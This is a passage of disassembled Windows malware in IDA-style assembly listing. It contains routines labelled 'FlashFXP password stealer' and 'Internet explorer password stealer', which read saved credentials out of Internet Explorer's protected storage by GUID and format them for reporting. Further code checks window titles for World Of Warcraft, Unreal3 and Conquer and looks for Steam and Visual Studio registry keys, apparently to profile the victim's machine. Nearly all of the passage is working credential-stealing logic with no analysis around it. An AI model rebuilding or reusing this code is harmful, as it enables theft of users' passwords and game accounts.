jmp loc_414BA6
; ---------------------------------------------------------------------------
loc_414E4B: ; CODE XREF: sub_414A1E+37E�j
; sub_414A1E+417�j
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
loc_414E57: ; CODE XREF: sub_414A1E:loc_414EA6�j
mov al, [ebp+var_330]
mov [ebp+var_190], al
push 3E8h
call dword_41709C ; Sleep
push [ebp+var_184]
push [ebp+var_334]
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D22C
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 14h
loc_414E96: ; CODE XREF: sub_414A1E:loc_414EA8�j
; sub_414A1E:loc_414EAA�j
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_414EAC
; ---------------------------------------------------------------------------
loc_414EA6: ; CODE XREF: sub_414A1E+3F0�j
jmp short loc_414E57
; ---------------------------------------------------------------------------
loc_414EA8: ; CODE XREF: sub_414A1E+140�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
loc_414EAA: ; CODE XREF: sub_414A1E+AC�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
locret_414EAC: ; CODE XREF: sub_414A1E+48�j
; sub_414A1E+486�j
leave
retn 4
sub_414A1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414EB0 proc near ; CODE XREF: sub_40A9CF+769�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414ECA
jmp short locret_414EF2
; ---------------------------------------------------------------------------
loc_414ECA: ; CODE XREF: sub_414EB0+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFlashfxpPasswo ; "FlashFXP password stealer"
push 0
push [ebp+var_4]
push offset sub_414A1E
call sub_4095A4
add esp, 10h
locret_414EF2: ; CODE XREF: sub_414EB0+18�j
leave
retn
sub_414EB0 endp
; =============== S U B R O U T I N E =======================================
sub_414EF4 proc near ; DATA XREF: sub_415AF0+40�o
mov eax, offset loc_416FDD
call sub_416E10
sub esp, 0FFCh
push esi
push edi
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-0BF0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
and dword ptr [ebp-0A00h], 0
and dword ptr [ebp-4], 0
cmp dword ptr [ebp-0A00h], 0
jz short loc_414F4C
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414F4C: ; CODE XREF: sub_414EF4+44�j
and dword ptr [ebp-0A00h], 0
push 0
push 0
push 0
lea eax, [ebp-0A00h]
push eax
call dword_41DE80
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_414FB2
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD0h], 0
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_414FA7
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FA7: ; CODE XREF: sub_414EF4+9F�j
mov eax, [ebp-0FD0h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_414FB2: ; CODE XREF: sub_414EF4+7F�j
and dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-10h], 0
jz short loc_414FCC
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FCC: ; CODE XREF: sub_414EF4+CA�j
and dword ptr [ebp-10h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_414FE3
push 80004003h
call sub_416E40
loc_414FE3: ; CODE XREF: sub_414EF4+E3�j
mov eax, [ebp-0A00h]
mov [ebp-0FE0h], eax
lea eax, [ebp-10h]
push eax
push 0
push 0
mov eax, [ebp-0FE0h]
mov eax, [eax]
push dword ptr [ebp-0FE0h]
call dword ptr [eax+38h]
mov [ebp-0FDCh], eax
cmp dword ptr [ebp-0FDCh], 0
jge short loc_41502D
push offset dword_41D598
push dword ptr [ebp-0FE0h]
push dword ptr [ebp-0FDCh]
call sub_416E4E
loc_41502D: ; CODE XREF: sub_414EF4+121�j
mov eax, [ebp-0FDCh]
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_415095
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD4h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_41506B
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41506B: ; CODE XREF: sub_414EF4+169�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_41508A
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41508A: ; CODE XREF: sub_414EF4+182�j
mov eax, [ebp-0FD4h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_415095: ; CODE XREF: sub_414EF4+14C�j
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D564
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 0Ch
and dword ptr [ebp-214h], 0
mov al, [ebp-0A54h]
mov [ebp-0A14h], al
and byte ptr [ebp-0A54h], 0
loc_4150CB: ; CODE XREF: sub_414EF4:loc_415A54�j
cmp dword ptr [ebp-10h], 0
jnz short loc_4150DB
push 80004003h
call sub_416E40
loc_4150DB: ; CODE XREF: sub_414EF4+1DB�j
push 0
lea eax, [ebp-0A10h]
push eax
push 1
mov eax, [ebp-10h]
mov [ebp-1000h], eax
mov eax, [ebp-1000h]
mov eax, [eax]
push dword ptr [ebp-1000h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A59
mov eax, [ebp-0BF0h]
cmp dword ptr [eax+4], 0
jz short loc_415119
jmp loc_415A59
; ---------------------------------------------------------------------------
loc_415119: ; CODE XREF: sub_414EF4+21E�j
sub esp, 10h
lea esi, [ebp-0A10h]
mov edi, esp
movsd
movsd
movsd
movsd
push offset asc_41D560 ; "%x"
lea eax, [ebp-0A48h]
push eax
call dword_4171E0 ; wsprintfA
add esp, 18h
and dword ptr [ebp-0DF8h], 0
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415163
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415163: ; CODE XREF: sub_414EF4+25B�j
and dword ptr [ebp-0DF8h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41517D
push 80004003h
call sub_416E40
loc_41517D: ; CODE XREF: sub_414EF4+27D�j
mov eax, [ebp-0A00h]
mov [ebp-0FE8h], eax
lea eax, [ebp-0DF8h]
push eax
push 0
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FE8h]
mov eax, [eax]
push dword ptr [ebp-0FE8h]
call dword ptr [eax+3Ch]
mov [ebp-0FE4h], eax
cmp dword ptr [ebp-0FE4h], 0
jge short loc_4151D1
push offset dword_41D598
push dword ptr [ebp-0FE8h]
push dword ptr [ebp-0FE4h]
call sub_416E4E
loc_4151D1: ; CODE XREF: sub_414EF4+2C5�j
mov eax, [ebp-0FE4h]
mov [ebp-0DF4h], eax
loc_4151DD: ; CODE XREF: sub_414EF4:loc_415A30�j
cmp dword ptr [ebp-0DF8h], 0
jnz short loc_4151F0
push 80004003h
call sub_416E40
loc_4151F0: ; CODE XREF: sub_414EF4+2F0�j
push 0
lea eax, [ebp-0E08h]
push eax
push 1
mov eax, [ebp-0DF8h]
mov [ebp-1004h], eax
mov eax, [ebp-1004h]
mov eax, [eax]
push dword ptr [ebp-1004h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A35
and dword ptr [ebp-0E14h], 0
mov byte ptr [ebp-4], 3
cmp dword ptr [ebp-0E14h], 0
jz short loc_415246
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415246: ; CODE XREF: sub_414EF4+33E�j
and dword ptr [ebp-0E14h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_415260
push 80004003h
call sub_416E40
loc_415260: ; CODE XREF: sub_414EF4+360�j
mov eax, [ebp-0A00h]
mov [ebp-0FF0h], eax
lea eax, [ebp-0E14h]
push eax
push 0
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF0h]
mov eax, [eax]
push dword ptr [ebp-0FF0h]
call dword ptr [eax+54h]
mov [ebp-0FECh], eax
cmp dword ptr [ebp-0FECh], 0
jge short loc_4152BB
push offset dword_41D598
push dword ptr [ebp-0FF0h]
push dword ptr [ebp-0FECh]
call sub_416E4E
loc_4152BB: ; CODE XREF: sub_414EF4+3AF�j
mov eax, [ebp-0FECh]
mov [ebp-0E10h], eax
loc_4152C7: ; CODE XREF: sub_414EF4+B18�j
cmp dword ptr [ebp-0E14h], 0
jnz short loc_4152DA
push 80004003h
call sub_416E40
loc_4152DA: ; CODE XREF: sub_414EF4+3DA�j
push 0
lea eax, [ebp-0E0Ch]
push eax
push 1
mov eax, [ebp-0E14h]
mov [ebp-1008h], eax
mov eax, [ebp-1008h]
mov eax, [eax]
push dword ptr [ebp-1008h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A11
push dword ptr [ebp-0E0Ch]
push offset aWs ; "%ws"
lea eax, [ebp-210h]
push eax
call dword_4171E0 ; wsprintfA
add esp, 0Ch
and dword ptr [ebp-0E18h], 0
and dword ptr [ebp-0EE8h], 0
and dword ptr [ebp-0EE4h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41534D
push 80004003h
call sub_416E40
loc_41534D: ; CODE XREF: sub_414EF4+44D�j
mov eax, [ebp-0E0Ch]
loc_415353: ; DATA XREF: .packed:off_419100�o
mov [ebp-0FFCh], eax
mov eax, [ebp-0A00h]
mov [ebp-0FF8h], eax
push 0
push dword ptr [ebp-0EE4h]
lea eax, [ebp-0EE8h]
push eax
lea eax, [ebp-0E18h]
push eax
push dword ptr [ebp-0FFCh]
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF8h]
mov eax, [eax]
push dword ptr [ebp-0FF8h]
call dword ptr [eax+44h]
mov [ebp-0FF4h], eax
cmp dword ptr [ebp-0FF4h], 0
jge short loc_4153C7
push offset dword_41D598
push dword ptr [ebp-0FF8h]
push dword ptr [ebp-0FF4h]
call sub_416E4E
loc_4153C7: ; CODE XREF: sub_414EF4+4BB�j
mov eax, [ebp-0FF4h]
mov [ebp-0E10h], eax
push dword ptr [ebp-0EE8h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-0E18h]
dec ecx
cmp eax, ecx
jnb loc_415477
and dword ptr [ebp-0EECh], 0
and dword ptr [ebp-0EF0h], 0
jmp short loc_41540C
; ---------------------------------------------------------------------------
loc_4153FE: ; CODE XREF: sub_414EF4+571�j
mov eax, [ebp-0EF0h]
inc eax
inc eax
mov [ebp-0EF0h], eax
loc_41540C: ; CODE XREF: sub_414EF4+508�j
mov eax, [ebp-0EF0h]
cmp eax, [ebp-0E18h]
jnb short loc_415467
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_41543D
mov eax, [ebp-0EECh]
mov byte ptr [ebp+eax-9FCh], 2Ch
jmp short loc_415458
; ---------------------------------------------------------------------------
loc_41543D: ; CODE XREF: sub_414EF4+537�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
mov ecx, [ebp-0EECh]
mov al, [eax]
mov [ebp+ecx-9FCh], al
loc_415458: ; CODE XREF: sub_414EF4+547�j
mov eax, [ebp-0EECh]
inc eax
mov [ebp-0EECh], eax
jmp short loc_4153FE
; ---------------------------------------------------------------------------
loc_415467: ; CODE XREF: sub_414EF4+524�j
mov eax, [ebp-0EECh]
and byte ptr [ebp+eax-9FDh], 0
jmp short loc_415492
; ---------------------------------------------------------------------------
loc_415477: ; CODE XREF: sub_414EF4+4F4�j
push dword ptr [ebp-0EE8h]
push offset dword_418B64
lea eax, [ebp-9FCh]
push eax
call dword_4171E0 ; wsprintfA
add esp, 0Ch
loc_415492: ; CODE XREF: sub_414EF4+581�j
push offset byte_41DE30
lea eax, [ebp-7FCh]
push eax
call dword_4170FC ; lstrcpyA
push offset byte_41DE30
lea eax, [ebp-0DF0h]
push eax
call dword_4170FC ; lstrcpyA
push offset a220d5cc1 ; "220d5cc1"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmpA
test eax, eax
jnz short loc_41550C
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41550C
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D510
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41550C: ; CODE XREF: sub_414EF4+5D6�j
; sub_414EF4+5EE�j
push offset a5e7e8100 ; "5e7e8100"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmpA
test eax, eax
jnz loc_4155CE
push offset byte_41DE30
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpyA
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415587
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpyA
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415587: ; CODE XREF: sub_414EF4+659�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D4AC
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4155CE: ; CODE XREF: sub_414EF4+62C�j
push offset aB9819c52 ; "b9819c52"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmpA
test eax, eax
jnz loc_415842
and dword ptr [ebp-0FC8h], 0
mov dword ptr [ebp-0EFCh], 1
and dword ptr [ebp-0FCCh], 0
jmp short loc_415610
; ---------------------------------------------------------------------------
loc_415602: ; CODE XREF: sub_414EF4:loc_4156CF�j
mov eax, [ebp-0FCCh]
inc eax
inc eax
mov [ebp-0FCCh], eax
loc_415610: ; CODE XREF: sub_414EF4+70C�j
mov eax, [ebp-0FCCh]
cmp eax, [ebp-0E18h]
jnb loc_4156D4
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_415652
mov eax, [ebp-0FC8h]
mov byte ptr [ebp+eax-9FCh], 2Ch
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
jmp short loc_4156CF
; ---------------------------------------------------------------------------
loc_415652: ; CODE XREF: sub_414EF4+73F�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov al, [eax]
push eax
call dword_4171DC ; IsCharAlphaNumericA
test eax, eax
jnz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 40h
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 2Eh
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 5Fh
jnz short loc_4156CF
loc_4156A7: ; CODE XREF: sub_414EF4+775�j
; sub_414EF4+789�j ...
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov ecx, [ebp-0FC8h]
mov al, [eax]
mov [ebp+ecx-9FCh], al
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
loc_4156CF: ; CODE XREF: sub_414EF4+75C�j
; sub_414EF4+7B1�j
jmp loc_415602
; ---------------------------------------------------------------------------
loc_4156D4: ; CODE XREF: sub_414EF4+728�j
mov eax, [ebp-0FC8h]
and byte ptr [ebp+eax-9FDh], 0
lea eax, [ebp-9FAh]
mov [ebp-0EF4h], eax
and dword ptr [ebp-0EF8h], 0
jmp short loc_415704
; ---------------------------------------------------------------------------
loc_4156F7: ; CODE XREF: sub_414EF4:loc_41583D�j
mov eax, [ebp-0EF8h]
inc eax
mov [ebp-0EF8h], eax
loc_415704: ; CODE XREF: sub_414EF4+801�j
mov eax, [ebp-0EE8h]
movzx eax, byte ptr [eax+4]
cmp [ebp-0EF8h], eax
jge loc_415842
mov eax, [ebp-0EF4h]
inc eax
push eax
lea eax, [ebp-0FC4h]
push eax
call dword_4170FC ; lstrcpyA
push offset dword_41D49C
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_41575C
push offset dword_41D49C
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_41575C: ; CODE XREF: sub_414EF4+850�j
push offset dword_41D49C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415798
push offset dword_41D49C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
inc eax
push eax
lea eax, [ebp-0F60h]
push eax
call dword_4170FC ; lstrcpyA
loc_415798: ; CODE XREF: sub_414EF4+87E�j
push offset dword_41D49C
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4157C5
push offset dword_41D49C
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4157C5: ; CODE XREF: sub_414EF4+8B9�j
push offset dword_41D49C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov esi, eax
lea eax, [ebp-0F60h]
push eax
call dword_41703C ; lstrlenA
lea eax, [esi+eax+9]
mov [ebp-0EF4h], eax
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41583D
lea eax, [ebp-0F60h]
push eax
lea eax, [ebp-0FC4h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D45C
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41583D: ; CODE XREF: sub_414EF4+91F�j
jmp loc_4156F7
; ---------------------------------------------------------------------------
loc_415842: ; CODE XREF: sub_414EF4+6EE�j
; sub_414EF4+820�j
push offset aE161255a ; "e161255a"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmpA
test eax, eax
jnz loc_4159E0
push offset aStringindex ; "StringIndex"
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz loc_4159E0
push offset dword_41D43C
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4158A4
push offset dword_41D43C
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4158A4: ; CODE XREF: sub_414EF4+998�j
push 8
lea eax, [ebp-210h]
push eax
lea eax, [ebp-0EE0h]
push eax
call dword_417100 ; lstrcpynA
push offset dword_41D434
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
push offset dword_41D42C
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_415933
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D3E4
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_415933: ; CODE XREF: sub_414EF4+A15�j
jmp loc_4159E0
; ---------------------------------------------------------------------------
loc_415938: ; CODE XREF: sub_414EF4+9DB�j
; sub_414EF4+9F2�j
push offset byte_41DE30
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpyA
push offset dword_41D49C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415999
push offset dword_41D49C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpyA
push offset dword_41D49C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415999: ; CODE XREF: sub_414EF4+A6B�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D388
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4159E0: ; CODE XREF: sub_414EF4+962�j
; sub_414EF4+97D�j ...
push 200h
push 0
lea eax, [ebp-210h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 200h
push 0
lea eax, [ebp-9FCh]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4152C7
; ---------------------------------------------------------------------------
loc_415A11: ; CODE XREF: sub_414EF4+410�j
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0E14h], 0
jz short loc_415A30
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A30: ; CODE XREF: sub_414EF4+B28�j
jmp loc_4151DD
; ---------------------------------------------------------------------------
loc_415A35: ; CODE XREF: sub_414EF4+326�j
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415A54
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A54: ; CODE XREF: sub_414EF4+B4C�j
jmp loc_4150CB
; ---------------------------------------------------------------------------
loc_415A59: ; CODE XREF: sub_414EF4+20E�j
; sub_414EF4+220�j
mov al, [ebp-0A14h]
mov [ebp-0A54h], al
push 3E8h
call dword_41709C ; Sleep
push dword ptr [ebp-214h]
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D34C
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 10h
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD8h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_415ABB
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ABB: ; CODE XREF: sub_414EF4+BB9�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_415ADA
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ADA: ; CODE XREF: sub_414EF4+BD2�j
mov eax, [ebp-0FD8h]
loc_415AE0: ; CODE XREF: sub_414EF4+B9�j
; sub_414EF4+19C�j
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
leave
retn 4
sub_414EF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415AF0 proc near ; CODE XREF: sub_40A9CF+7F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_41DE80, 0
jnz short loc_415AFF
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415AFF: ; CODE XREF: sub_415AF0+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415B15
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415B15: ; CODE XREF: sub_415AF0+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aInternetExplor ; "Internet explorer password stealer"
push 0
push [ebp+var_4]
push offset sub_414EF4
call sub_4095A4
add esp, 10h
locret_415B3D: ; CODE XREF: sub_415AF0+D�j
; sub_415AF0+23�j
leave
retn
sub_415AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B3F proc near ; CODE XREF: .packed:00416FB6�p
; .packed:00416FBF�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short locret_415B5E
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
locret_415B5E: ; CODE XREF: sub_415B3F+D�j
leave
retn
sub_415B3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B60 proc near ; DATA XREF: sub_415DFD+35�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = dword ptr -5C4h
var_5C0 = dword ptr -5C0h
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_41C = byte ptr -41Ch
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5B8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
and [ebp+var_5C4], 0
and [ebp+var_410], 0
and [ebp+var_40C], 0
and [ebp+var_408], 0
and [ebp+var_404], 0
and [ebp+var_5BC], 0
jmp short loc_415BC2
; ---------------------------------------------------------------------------
loc_415BB5: ; CODE XREF: sub_415B60:loc_415C50�j
mov eax, [ebp+var_5BC]
inc eax
mov [ebp+var_5BC], eax
loc_415BC2: ; CODE XREF: sub_415B60+53�j
cmp [ebp+var_5BC], 0FFFFh
jnb loc_415C55
push 400h
lea eax, [ebp+var_400]
push eax
push [ebp+var_5BC]
call dword_4171E4 ; GetWindowTextA
push 7
push offset aUnreal3 ; "Unreal3"
lea eax, [ebp+var_400]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_415C0E
mov [ebp+var_410], 1
loc_415C0E: ; CODE XREF: sub_415B60+A2�j
push offset aWorldOfWarcraf ; "World Of Warcraft"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C2F
mov [ebp+var_408], 1
loc_415C2F: ; CODE XREF: sub_415B60+C3�j
push offset aConquer ; "[Conquer]"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C50
mov [ebp+var_404], 1
loc_415C50: ; CODE XREF: sub_415B60+E4�j
jmp loc_415BB5
; ---------------------------------------------------------------------------
loc_415C55: ; CODE XREF: sub_415B60+6C�j
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Set"...
push 80000002h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415C88
mov [ebp+var_5C4], 1
loc_415C88: ; CODE XREF: sub_415B60+11C�j
push [ebp+var_5C0]
call dword_417028 ; RegCloseKey
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareValveS ; "Software\\Valve\\Steam"
push 80000001h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415CC7
mov [ebp+var_40C], 1
loc_415CC7: ; CODE XREF: sub_415B60+15B�j
push [ebp+var_5C0]
call dword_417028 ; RegCloseKey
movsx eax, [ebp+var_41C]
test eax, eax
jz short loc_415D1E
cmp [ebp+var_410], 0
jnz short loc_415D1E
cmp [ebp+var_5C4], 0
jnz short loc_415D1E
cmp [ebp+var_40C], 0
jnz short loc_415D1E
cmp [ebp+var_408], 0
